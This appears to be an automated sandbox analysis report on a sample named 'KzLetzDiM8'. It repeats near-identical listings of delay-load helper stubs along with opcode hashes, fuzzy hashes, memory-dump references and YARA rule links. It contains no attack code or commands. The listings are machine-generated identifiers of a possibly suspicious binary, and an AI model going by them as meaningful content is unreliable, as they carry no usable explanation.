                                                            • Instruction ID: f04452127e2556a3ff227d6c4ff949caca7c2fccacb8d0724f1ca15bb3e7b328
                                                            • Opcode Fuzzy Hash: b44e1abbaac4d1a001db02f0125d90363152c09d96a0daf54ed8c286ed9fb444
                                                            • Instruction Fuzzy Hash: EAB012E52BC144BC311CB1061C02D3702CDC0E2F30330813EFD0EC0090D940AD500431
                                                            Function 001FE20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 5fd4d39220bb8f2d705d4447a6d69e987bde94ac7b022d012d682c871be27f56
                                                            • Instruction ID: 3abff0c617ee6a2cf0dc3f85fa611a4354532836c34ac95855f6c62af4e06b60
                                                            • Opcode Fuzzy Hash: 5fd4d39220bb8f2d705d4447a6d69e987bde94ac7b022d012d682c871be27f56
                                                            • Instruction Fuzzy Hash: 4AB012D62BC104BC321CB2061D02C3742CDC0D1B20330803EF90EC0190DD516D590431
                                                            Function 001FE200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 95fd5caea466616a0157775665ffe98a2219fdbead43e01709533be8706d403b
                                                            • Instruction ID: 5b78b5f05b4b2c25b7330973bae49490d6cfc9e100812103a169740cfe5cd7a6
                                                            • Opcode Fuzzy Hash: 95fd5caea466616a0157775665ffe98a2219fdbead43e01709533be8706d403b
                                                            • Instruction Fuzzy Hash: A6B012D63BC244BC325CB2061C02C3702CDC0D1B20330853EF90EC0190D9406C940431
                                                            Function 001FE23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: af18a0321cea03ba4a5fdd2732a922ac8f5aa1a6a2932ab80383bb4a512c1926
                                                            • Instruction ID: ce4292485a54b92bfdd6ce68bb0414cb7511566725574d096b4769984186c693
                                                            • Opcode Fuzzy Hash: af18a0321cea03ba4a5fdd2732a922ac8f5aa1a6a2932ab80383bb4a512c1926
                                                            • Instruction Fuzzy Hash: FDB012E52BC104BC311CB1071C02D3742CDC0E1F30330403EF90EC0091D9406D500431
                                                            Function 001FE232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: daf4d4adfac30038482b933de7622f908b3b4fc35669a0cfe6086fa1ad1e0f6e
                                                            • Instruction ID: 92252e3c05bca8210aac3c7c5fa51024e1948e25e2e5ab96f283f0a727c55b73
                                                            • Opcode Fuzzy Hash: daf4d4adfac30038482b933de7622f908b3b4fc35669a0cfe6086fa1ad1e0f6e
                                                            • Instruction Fuzzy Hash: 92B012E52BC104BC311CB1061D02D3742CDC0E1F30330403EF90EC0090DD416E510431
                                                            Function 001FE228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 21f7c7ad5ce0c1f6a5f278c037b01affb2943139f7f5dae3cd280798d5e37876
                                                            • Instruction ID: 70d76656a335f40939b198152d02c031fcee907e9ea6522802a3e2d7af7725c5
                                                            • Opcode Fuzzy Hash: 21f7c7ad5ce0c1f6a5f278c037b01affb2943139f7f5dae3cd280798d5e37876
                                                            • Instruction Fuzzy Hash: ADB012E52BC204BC315CB1061C02D3702CDC0E1F30330413EF90EC0090D9416D900431
                                                            Function 001FE250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: c17f19845ca32aacabf01d1c83cf310b0a80d0fd6c556a3e0d016d5499bcb9c3
                                                            • Instruction ID: fe3a6e0c1b2bf986b8533478cb737705e4695786e98f35cfd588c37a1236f7d4
                                                            • Opcode Fuzzy Hash: c17f19845ca32aacabf01d1c83cf310b0a80d0fd6c556a3e0d016d5499bcb9c3
                                                            • Instruction Fuzzy Hash: 0AB012E52BD244BC315CB2061C02C3702CEC1D1B20330413EF90EC0090D9806C940431
                                                            Function 001FE246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: e64a9c454815296ded9e0f869b52dd9ef9245979f7c2fb18bbe385c2f1b7a905
                                                            • Instruction ID: 0a78cc0c31acbb9b4212a415f548f1ef8b73456328e284305ee0ec83415433b5
                                                            • Opcode Fuzzy Hash: e64a9c454815296ded9e0f869b52dd9ef9245979f7c2fb18bbe385c2f1b7a905
                                                            • Instruction Fuzzy Hash: 1FB012D52BD184BC311CB1061C02C3702CEC1D2B20330803EFD0EC0090D980AC600431
                                                            Function 001FE26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 7becaef2a919886d3c2f877ed58dc2846012bc964dfec38c88d36039c7b45d95
                                                            • Instruction ID: 4af1a3182985257c28ebc6f36c0164ed6e3ef8fe9f64599843a822001f0bc3f6
                                                            • Opcode Fuzzy Hash: 7becaef2a919886d3c2f877ed58dc2846012bc964dfec38c88d36039c7b45d95
                                                            • Instruction Fuzzy Hash: 86B012D92BC144BC311CB1161C02C3702CDC0D2B20330803EFE0ED4090DA40AC500831
                                                            Function 001FE264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 55ee45059415f9f4cab4a2951499750ea6339690cd09ef85ed1b6ff3db1a3ca5
                                                            • Instruction ID: 72b5531473b81d1664b963f01cee15f6234d91d1669a3f41fad87c50576580ee
                                                            • Opcode Fuzzy Hash: 55ee45059415f9f4cab4a2951499750ea6339690cd09ef85ed1b6ff3db1a3ca5
                                                            • Instruction Fuzzy Hash: 88B012D52BD144BC311CB1061C02C3702CEC5D1B20330403EF90FC0090D9806C500431
                                                            Function 001FE282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: e3d4f9807c9e62ffad005ff1df8beac3d6c8f677743e2d3df870deda373b23cd
                                                            • Instruction ID: 4870d602428bd450cca9be38418f735e7da0d9d7acfcca05172e544060e6fdc3
                                                            • Opcode Fuzzy Hash: e3d4f9807c9e62ffad005ff1df8beac3d6c8f677743e2d3df870deda373b23cd
                                                            • Instruction Fuzzy Hash: 71B012E52BC104BC311CB1061D02C3742CDC0D1B20330403EF90ED4090DD416D510831
                                                            Function 001FE2B4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 36cbeb0c3922e47f926319a0ffb56410b270d6a066ed7d0f779ae68ebffb5106
                                                            • Instruction ID: 82f06c0ee707c506ab564bc0d0e3b101bf7af7f8549222614247c014e90c31dd
                                                            • Opcode Fuzzy Hash: 36cbeb0c3922e47f926319a0ffb56410b270d6a066ed7d0f779ae68ebffb5106
                                                            • Instruction Fuzzy Hash: 6CB012D52BC104BC312CB1061C03C7702CDC0D5B20330443EF90EC00D0D9406C500431
                                                            Function 001FE419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE3FC
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: e6cab2d07e4400d9a7ae5276fd2957790b11e62e004c7182b5c85785554e3b5d
                                                            • Instruction ID: 49e06912bbc93b78454a46466598fb76453244487f27ac9f49ff139ea8b47c8e
                                                            • Opcode Fuzzy Hash: e6cab2d07e4400d9a7ae5276fd2957790b11e62e004c7182b5c85785554e3b5d
                                                            • Instruction Fuzzy Hash: 6DB012E62B82947C330CE1041D06C7702CCC0D1B30331D12EF705C1094D9400C6A0433
                                                            Function 001FE423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE3FC
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 2c96178a7bf9b36e53b7e076ada93e98d78abfff15e7708c83b9baf6f1270f86
                                                            • Instruction ID: 68b26378ec9cf6e40cf7752fdc3e444d26843787ac07b6fd9a3b1e91990ca8de
                                                            • Opcode Fuzzy Hash: 2c96178a7bf9b36e53b7e076ada93e98d78abfff15e7708c83b9baf6f1270f86
                                                            • Instruction Fuzzy Hash: 2CB012F52B8284BC310CE1041C06C3702CCC0E1F30331922EF905C1094D9404E610433
                                                            Function 001FE44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE3FC
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 874d693e1cc93205e187ca266cf9462aade97d0ac4f6b7122cd4572f2ddc0949
                                                            • Instruction ID: ff15ee854c9501db14552c8c018321c7ae1143fcb74a8aca5ea5e212136ad77d
                                                            • Opcode Fuzzy Hash: 874d693e1cc93205e187ca266cf9462aade97d0ac4f6b7122cd4572f2ddc0949
                                                            • Instruction Fuzzy Hash: 41B012E62B8284BC320CE1041C06C3702CCC0D1B30331D12EFA05C1094D9404C650433
                                                            Function 001FE50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE51F
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
